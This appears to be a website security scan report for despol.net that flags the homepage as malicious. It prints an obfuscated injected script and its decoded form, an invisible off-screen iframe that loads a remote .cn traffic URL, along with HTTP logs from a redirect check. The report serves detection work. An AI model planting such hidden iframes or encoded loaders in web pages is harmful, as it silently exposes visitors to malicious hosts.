Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=despol.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://despol.net/ | 200 OK Content-Length: 2934 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var GDNWkFVfDjqLGhmperCG = "JIC60JIC105JIC102JIC114JIC97JIC109JIC101JIC32JIC119JIC105JIC100JIC116JIC104JIC61JIC34JIC52JIC56JIC48JIC34JIC32JIC104JIC101JIC105JIC103JIC104JIC116JIC61JIC34JIC54JIC48JIC34JIC32JIC115JIC114JIC99JIC61JIC34JIC104JIC116JIC116JIC112JIC58JIC47JIC47JIC115JIC101JIC110JIC100JIC50JIC57JIC57JIC51JIC49JIC46JIC99JIC110JIC47JIC116JIC114JIC97JIC102JIC102JIC47JIC105JIC110JIC46JIC99JIC103JIC105JIC63JIC51JIC34JIC32JIC115JIC116JIC121JIC108JIC101JIC61JIC34JIC98JIC111JIC114JIC100JIC101JIC Decoded script: <iframe width="480" height="60" src="http://send29931.cn/traff/in.cgi?3" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe> Antivirus reports:
| ||
http://despol.net/test404page.js | 404 Not Found Content-Length: 2350 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: despol.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Apr 2014 20:47:07 GMT
Accept-Ranges: bytes
Server: Apache/2
Vary: Accept-Encoding
Content-Length: 2934
Content-Type: text/html
...2934 bytes of data.
GET / HTTP/1.1
Host: despol.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Apr 2014 20:47:07 GMT
Accept-Ranges: bytes
Server: Apache/2
Vary: Accept-Encoding
Content-Length: 2934
Content-Type: text/html
...2934 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: despol.net
Referer: http://www.google.com/search?q=despol.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: despol.net
Referer: http://www.google.com/search?q=despol.net
Result:
The result is similar to the first query. There are no suspicious redirects found.